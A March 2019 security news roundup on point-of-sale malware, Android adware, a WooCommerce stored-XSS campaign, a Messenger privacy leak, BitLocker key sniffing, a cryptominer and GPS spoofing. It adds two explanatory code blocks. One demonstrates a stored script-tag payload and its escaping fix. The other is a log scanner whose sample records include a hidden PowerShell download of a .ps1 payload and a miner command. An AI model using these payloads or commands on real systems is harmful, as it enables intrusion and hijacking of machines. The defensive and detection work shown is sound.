15 March 2019
New GlitchPOS malware skims credit card numbers from the memory of the infected POS systems
A new malware strain has been found targeting firms in the retail and hospitality sectors. Dubbed ‘GlitchPOS’, the POS malware is being sold by cybercriminals on a crimeware forum. In a blog post, Cisco Talos researchers described a video released by the cybercriminals that comes with a set of instructions on how to use the malware. To distribute it, they are leveraging phishing emails that contain a fake game featuring a cute cat. In this way, they fool users, who unknowingly download the malware by clicking on the video. Once installed, GlitchPOS connects to a command and control (C2) server, and the commands received from the C2 server are executed via shellcode. According to Cisco researchers, a malware author who goes by the name Edbitss is behind GlitchPOS. The same author is alleged to have developed the DiamondFox L!NK botnet in 2015/2016 and 2017. Although the malware is being marketed globally, experts claim that residents of the US are the primary target of GlitchPOS.
Android Adware ‘SimBad’ detected in 206 Android apps with almost 150 million installs
Researchers from Check Point detected Android adware dubbed ‘SimBad’ in 206 Android applications that were available for download in the Google Play Store. These applications were installed by almost 150 million Android users. The adware resides in the RXDrioder Software Development Kit (SDK), which allowed attackers to display ads on an Android device when the device was booted or the user unlocked the screen. Most of the apps that included the adware were driving and racing simulator games such as Snow Heavy Excavator Simulator, Ambulance Rescue Driving, and Water Surfing Car Stunt. Check Point researchers notified Google about the adware, and Google has removed all 206 apps from the Google Play Store. Google responded quickly: it took them a couple of weeks to review the apps and conduct their own investigation before the apps were finally removed.
Hackers abuse XSS vulnerability in cart plugin to target WordPress-based shopping sites
WordPress-based shopping sites are being targeted by cybercriminals to plant backdoors and take control of other vulnerable sites. The cyber crooks are abusing a vulnerability in the shopping cart plugin ‘Abandoned Cart Lite for WooCommerce’ to target the sites. According to Defiant, the company behind Wordfence, hackers are targeting WordPress sites that use the ‘Abandoned Cart Lite for WooCommerce’ plugin. The plugin is reported to have been installed more than 20,000 times across WordPress sites. It allows site administrators to view abandoned shopping carts, where users add products to their carts and then leave the site without completing the purchase. The hackers are leveraging a stored cross-site scripting (XSS) vulnerability in the plugin to create the perfect storm. They add exploit code in one of the shopping cart’s fields and then leave the site. In this way, the injected exploit code gets stored in the shop’s database without the knowledge of the owner. The attackers make use of URL shortening services like ‘bit.ly’ to load the exploit code onto the sites running the vulnerable plugin. When an admin accesses the shop’s backend to view the list of abandoned carts, the hackers’ exploit code gets executed in the admin’s browser.
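The mechanism described above, as an added example that is not from the Wordfence write-up or the plugin’s own code: a minimal Python rendering of an “abandoned cart” admin table. The vulnerable renderer interpolates the shopper-supplied field verbatim, so whatever was stored at checkout is executed when the admin views the page; the hardened renderer escapes every untrusted value first (the equivalent of WordPress’s `esc_html()`). The cart records and the short URL are constructed for the example.

```python
# Added example: stored XSS in an admin view, vulnerable vs. hardened rendering.
# Not code from the plugin or from Defiant/Wordfence; all data is constructed.
import html
import re

# Constructed abandoned-cart records: one honest shopper and one record whose
# name field carries a script tag, the same shape as a malicious checkout-form
# submission that the shop stores without validation.
CARTS = [
    {"email": "alice@example.com", "name": "Alice", "items": 2},
    {"email": "mallory@example.com",
     "name": '<script src="https://short.example/x"></script>', "items": 1},
]

ROW = "<tr><td>{email}</td><td>{name}</td><td>{items}</td></tr>"


def render_vulnerable(carts):
    """Builds the admin table from raw field values: the stored payload fires."""
    return "<table>" + "".join(ROW.format(**c) for c in carts) + "</table>"


def render_hardened(carts):
    """Escapes every shopper-controlled value before it reaches the admin's browser."""
    rows = []
    for c in carts:
        safe = {k: html.escape(str(v), quote=True) for k, v in c.items()}
        rows.append(ROW.format(**safe))
    return "<table>" + "".join(rows) + "</table>"


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_active_script(page):
    """True if the rendered page still carries a live <script> element."""
    return SCRIPT_TAG.search(page) is not None


if __name__ == "__main__":
    print("vulnerable page executes injected script:",
          contains_active_script(render_vulnerable(CARTS)))
    print("hardened page executes injected script:",
          contains_active_script(render_hardened(CARTS)))
```

Escaping on output is the fix that survives any input the database already holds, which matters here because the payload is planted long before the admin opens the page; input validation at checkout alone would not clean records that are already stored.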
Bug in Facebook Messenger allows attackers to see who users chat with
It seems that security and privacy woes continue to trouble Facebook. In a recent incident, Ron Masas, a security researcher at Imperva, discovered a security bug in the platform’s messaging website, Messenger. The flaw was found in the application’s desktop website. Attackers could insert malicious links which, upon clicking, would allow them to see users’ conversations. The number of iframes loaded in the page gives information about the state of the webpage. As per the researcher's blog, "When the current user has not been in contact with a specific user, the iframe count would reach three and then always drop suddenly for a few milliseconds. This lets an attacker reliably distinguish between the full and empty states. This could let him remotely check if the current user has chatted with a specific person or business, which would violate those users’ privacy." Thus, the researcher was able to leak the state of the cross-origin window by analyzing the raw pattern of iframe count over time or by timing certain “milestones” of the pattern. When the researcher reached out to Facebook regarding the security issue, they first tried randomizing the number of iframes on the page. However, the researcher could still adapt his algorithm to leak the state. Finally, Facebook removed all the iframe elements present in the user interface of Messenger to get rid of the issue.
New attack could extract BitLocker encryption keys from a TPM
A security researcher from Pulse Security named Denis Andzakovic has come up with a new attack vector that could extract BitLocker encryption keys from a computer’s TPM (Trusted Platform Module). All it requires to extract BitLocker keys is a $27 FPGA board and some open-source code, or a logic analyzer. “By default, Microsoft BitLocker protected OS drives can be accessed by sniffing the LPC bus, retrieving the volume master key when it’s returned by the TPM, and using the retrieved VMK to decrypt the protected drive. This post will look at extracting the clear-text key from a TPM chip by sniffing the LPC bus, either with a logic analyzer or a cheap FPGA board,” Andzakovic said. To be precise, this attack requires physical access to a device, which means an attacker needs to hardwire equipment into the system’s motherboard or TPM chip and sniff communications on the Low Pin Count (LPC) bus. The attacker could then access highly valuable information such as proprietary business documents, cryptocurrency wallet keys, and other sensitive data stored on the system.
PsMiner propagates by exploiting known vulnerabilities and weak credentials
The 360 Total Security team uncovered a new Monero mining malware dubbed ‘PsMiner’ that is written in the Go language and includes worm-like capabilities. The malware spreads by exploiting known vulnerabilities in servers running ElasticSearch, Hadoop, Redis, Spring, WebLogic, ThinkPHP, and SQL Server. It also spreads using weak system credentials: PsMiner can brute-force weak or default system credentials with its password-cracking module. After successful exploitation of a vulnerability or weak credentials, the malware executes a PowerShell command on the victim’s machine via cmd.exe. That command downloads a malicious ‘WindowsUpdate.ps1’ payload, which drops the Monero miner. PsMiner then uses the open-source XMRig CPU miner to mine Monero cryptocurrency. To stay protected from such malware, it is highly recommended to patch all known vulnerabilities and upgrade to the patched versions, and to reset all default passwords to strong, unique, and complex passwords.
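A detection view of the infection chain described above, as an added example that is not from the 360 Total Security report or from PsMiner itself: a small Python scanner run over constructed process-creation records. It flags the three observable steps the paragraph names (a PowerShell download of a `.ps1` launched through cmd.exe, a miner-style command line, and a shell spawned by a server process such as a Java or Redis daemon). The pipe-separated record format, the field names and the sample command lines are assumptions for this example, not a specific product’s log format.

```python
# Added example: detection logic for a PsMiner-style chain over constructed
# process-creation records. Not from the 360 report; all records are made up.
import re

# Constructed records: timestamp | parent image | image | command line.
# 198.51.100.7 is a documentation address and pool.example is a placeholder.
SAMPLE_LOG = """\
2019-03-12T10:01:02Z|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -nop -w hidden -c "Invoke-WebRequest http://198.51.100.7/WindowsUpdate.ps1 -OutFile C:\\Temp\\WindowsUpdate.ps1"
2019-03-12T10:01:09Z|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|C:\\ProgramData\\svchost.exe|svchost.exe -o pool.example:3333 --donate-level 1
2019-03-12T10:05:44Z|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell Get-ChildItem C:\\Users
2019-03-12T10:06:10Z|C:\\Program Files\\Elastic\\jvm.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c whoami
"""

# A download cmdlet followed by a .ps1 target anywhere later in the command line.
DOWNLOAD_CRADLE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|iwr|curl)\b.*\.ps1", re.I)
# Typical CPU-miner arguments: a host:port pool target or XMRig-specific flags.
MINER_ARGS = re.compile(r"--donate-level|-o\s+\S+:\d+|xmrig", re.I)
# Server daemons that should not normally spawn an interactive shell.
SERVER_PARENTS = ("jvm.exe", "java.exe", "redis-server.exe",
                  "httpd.exe", "w3wp.exe", "sqlservr.exe")


def parse(line):
    """Splits one record into its four fields, reducing image paths to basenames."""
    ts, parent, image, cmd = line.split("|", 3)
    return {"ts": ts,
            "parent": parent.rsplit("\\", 1)[-1].lower(),
            "image": image.rsplit("\\", 1)[-1].lower(),
            "cmd": cmd}


def classify(rec):
    """Returns the list of alert tags for one record (empty when nothing matches)."""
    tags = []
    if (rec["image"] == "powershell.exe" and rec["parent"] == "cmd.exe"
            and DOWNLOAD_CRADLE.search(rec["cmd"])):
        tags.append("ps1-download-via-cmd")
    if MINER_ARGS.search(rec["cmd"]):
        tags.append("miner-cmdline")
    if rec["parent"] in SERVER_PARENTS and rec["image"] in ("cmd.exe", "powershell.exe"):
        tags.append("server-spawned-shell")
    return tags


def scan(log_text):
    """Maps the timestamp of each suspicious record to its alert tags."""
    alerts = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse(line)
        tags = classify(rec)
        if tags:
            alerts[rec["ts"]] = tags
    return alerts


if __name__ == "__main__":
    for ts, tags in scan(SAMPLE_LOG).items():
        print(ts, ", ".join(tags))
```

The benign PowerShell launched from explorer.exe produces no alert, which is the point of keying the download rule on the cmd.exe parent and the `.ps1` target together rather than on PowerShell alone; the jvm.exe record is the exploitation step that precedes the download, and catching it gives the earliest signal.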
Seven car manufacturers hit by GPS spoofing attacks
At least seven car manufacturers were hit by GPS spoofing attacks that took place at the annual Geneva Motor Show last week. According to Jalopnik, attackers leveraged the bug in the default ‘Location’ setting of the LabSat device and changed the locations of many cars to Buckingham. In addition, the attackers were also able to change the current year shown on the GPS systems to 2036. The car manufacturers affected by the false GPS signaling are Audi, Peugeot, Renault, Rolls-Royce, Volkswagen, Daimler-Benz, and BMW. The perpetrators spoofed the GPS signals of the LabSat device in order to cause real trouble for drivers. By broadcasting false GPS signals, they created confusion among drivers by showing them wrong dates and locations. A GPS spoofing attack not only confuses drivers but can also leave automated cars extremely vulnerable to attack. It is still unknown whether any threat actor was involved or whether the incident was accidental.